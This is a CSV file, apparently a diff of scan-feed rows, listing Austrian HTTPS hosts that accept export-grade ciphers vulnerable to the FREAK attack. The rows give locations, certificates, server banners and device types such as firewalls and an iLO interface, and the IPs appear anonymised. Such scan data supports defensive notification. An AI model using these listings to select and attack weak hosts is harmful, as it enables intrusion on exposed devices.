+2018-04-23 13:26:28,198.51.100.146,443,198-51-100-146.example.net,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_RC4_128_SHA,1024,zywall_110_A0E4CB7CE5AF,zywall_110_A0E4CB7CE5AF,2015-01-26 17:19:56,2025-01-23 17:19:56,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,54C6773C,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:31 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:34,198.51.100.233,443,,ssl-freak,TLSv1.0,8447,AT,KARNTEN,KLAGENFURT AM WORTHERSEE,TLS_RSA_WITH_RC4_128_SHA,1024,198.51.100.174,198-51-100-174.example.net,2009-04-14 07:26:09,2025-04-15 07:26:09,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,A0571920C03C9EE0DA1168E586E0E8D440E42EA69D898AC829,sha1WithRSAEncryption,rsaEncryption,,General,DE,SomeState,SomeCity,,,,,198-51-100-174.example.net,,,,General,DE,SomeState,SomeCity,,,,,198-51-100-174.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,Close,,,LANCOM 1781A 8.50.0161 / 09.08.2011,,,,Y,N,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:35,198.51.100.106,443,198-51-100-106.example.net,ssl-freak,TLSv1.0,12793,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-106.example.net,SHT-Gruppe CA,2004-07-20 07:28:10,2006-07-20 07:38:10,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,190DBE75000000000007,sha1WithRSAEncryption,rsaEncryption,,,AT,SomeState,SomeCity,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/6.0,1508,,"Mon, 23 Apr 2018 13:26:37 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:37,198.51.100.191,443,,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,LEBRING,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB669448,usg20_5CF4AB669448,2015-10-01 00:00:38,2035-09-26 00:00:38,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,560C77A6,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:40 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:42,198.51.100.235,443,198-51-100-235.example.net,ssl-freak,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_107BEF33651A,usg50_107BEF33651A,2014-04-24 00:00:27,2034-04-19 00:00:27,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,5358541B,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:45 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:43,198.51.100.167,443,198-51-100-167.example.net,ssl-freak,TLSv1.0,8412,AT,BURGENLAND,ELTENDORF,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-167.example.net,198-51-100-167.example.net,2008-08-19 06:57:11,2010-08-19 06:57:11,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2,sha1WithRSAEncryption,rsaEncryption,SuSE Linux Web Server,web server,XY,unknown,unknown,,,,,198-51-100-167.example.net,,,SuSE Linux Web Server,CA,XY,SomeState,unknown,,,,,198-51-100-167.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache/2.2.3 (Linux/SUSE),80,,"Mon, 23 Apr 2018 13:26:45 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:47,198.51.100.42,443,198-51-100-42.example.net,ssl-freak,TLSv1.0,8437,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-42.example.net,iLO Default Issuer (Do not trust),2013-11-05 00:00:00,2028-11-04 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,72FD09EF,sha1WithRSAEncryption,rsaEncryption,,,US,SomeState,SomeCity,,,,,,,,,,US,SomeState,Houston,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,,,,,,,,,N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:48,198.51.100.177,443,198-51-100-177.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB625772,usg20_5CF4AB625772,2015-03-04 00:00:39,2035-02-27 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,54F64B27,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:50 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:48,198.51.100.66,443,198-51-100-66.example.net,ssl-freak,TLSv1.0,5385,AT,VORARLBERG,DORNBIRN,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-66.example.net,198-51-100-66.example.net,2009-10-06 11:23:48,2015-03-29 11:23:48,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,98B18BCD61B0CD5D,sha1WithRSAEncryption,rsaEncryption,,??,??,??,??,,,,,??,,,,??,??,??,??,,,,,??,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,close,,DSSignInURL=/; path=/; secure,,,,,Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:48,198.51.100.29,443,198-51-100-29.example.net,ssl-freak,TLSv1.0,6830,AT,NIEDEROSTERREICH,GUNTRAMSDORF,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_FCF52878354B,usg20_FCF52878354B,2013-05-20 00:00:39,2033-05-15 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,519967A7,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:50 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:49,198.51.100.235,443,,ssl-freak,TLSv1.0,8447,AT,TIROL,KITZBUHEL,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC3AEFE7,usg50_B0B2DC3AEFE7,2012-10-30 00:02:36,2032-10-25 00:02:36,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,508F191C,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:52 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:50,198.51.100.159,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-159.example.net,198-51-100-159.example.net,2002-01-09 20:22:25,2003-01-09 20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-159.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-159.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:26:52 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:51,198.51.100.138,443,198-51-100-138.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_B0B2DC34A1F6,usg20_B0B2DC34A1F6,2012-06-16 00:00:58,2032-06-11 00:00:58,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FDBCCBA,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:54 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:52,198.51.100.64,443,,ssl-freak,TLSv1.0,1853,AT,OBEROSTERREICH,WILHERING,TLS_RSA_WITH_RC4_128_SHA,1024,198.51.100.171,198.51.100.117,2017-08-10 10:48:40,2020-08-09 10:48:40,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,598C3A08,sha1WithRSAEncryption,rsaEncryption,,,,,SomeCity,,,,,,,,,,,,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,5597,,"Mon, 23 Apr 2018 13:26:54 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:55,198.51.100.189,443,198-51-100-62.example.net,ssl-freak,TLSv1.0,25255,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_107BEF3A4C9E,usg20w_107BEF3A4C9E,2014-07-04 00:00:43,2034-06-29 00:00:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,53B5EEAB,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:57 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:56,198.51.100.17,443,198-51-100-17.example.net,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,SOEDING,TLS_RSA_WITH_AES_256_CBC_SHA,1024,Vimar By-Web,Vimar By-Web,2011-10-27 09:19:55,2016-10-25 09:19:55,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B82B13ED1FB0FD71,sha1WithRSAEncryption,rsaEncryption,,R&D,IT,SomeState,SomeCity,,,,,,,,,R&D,IT,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,text/html,keep-alive,,,nginx/0.6.32,,chunked,"Mon, 23 Apr 2018 13:26:56 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:56,198.51.100.111,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-111.example.net,198-51-100-111.example.net,2002-01-09 20:22:25,2003-01-09 20:22:25,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0,md5WithRSAEncryption,rsaEncryption,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-111.example.net,,,SomeOrganization,SomeOrganizationalUnit,--,SomeState,SomeCity,,,,,198-51-100-111.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,close,,,Apache/1.3.33 (Unix)  (Red-Hat/Linux) FrontPage/4.,31,,"Mon, 23 Apr 2018 13:26:58 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:56,198.51.100.179,443,198-51-100-179.example.net,ssl-freak,TLSv1.0,12605,AT,OBEROSTERREICH,LINZ,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB665FB9,usg20_5CF4AB665FB9,2015-09-25 00:00:42,2035-09-20 00:00:42,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,56048EAA,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:58 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:58,198.51.100.143,443,,ssl-freak,TLSv1.0,8447,AT,KARNTEN,GLAN,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_FCF5285DEDC4,usg20_FCF5285DEDC4,2012-11-09 00:00:44,2032-11-04 00:00:44,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,509C47AC,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:00 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:58,198.51.100.111,443,198-51-100-111.example.net,ssl-freak,TLSv1.0,1901,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,*.*,198-51-100-111.example.net,2009-01-16 12:51:43,2010-01-16 12:51:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6,md5WithRSAEncryption,rsaEncryption,,,IL,SomeState,,,,,,,,,,Visonic CA,IL,SomeState,,,,,,198-51-100-111.example.net,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html,close,,PowerLink=226002836046b4bddcd2d16b809f76d9; path=/,Apache/1.3.31 (Unix) PHP/4.3.9 mod_ssl/2.8.20 Open,,chunked,"Wed, 23 Jan 2002 10:17:09 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:59,198.51.100.79,443,,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB65A17C,usg20_5CF4AB65A17C,2015-09-01 00:00:51,2035-08-27 00:00:51,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,55E4EAB3,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:02 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:59,198.51.100.90,443,,ssl-freak,TLSv1.0,8218,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-90.example.net,198-51-100-90.example.net,2002-01-09 20:22:25,2003-01-09 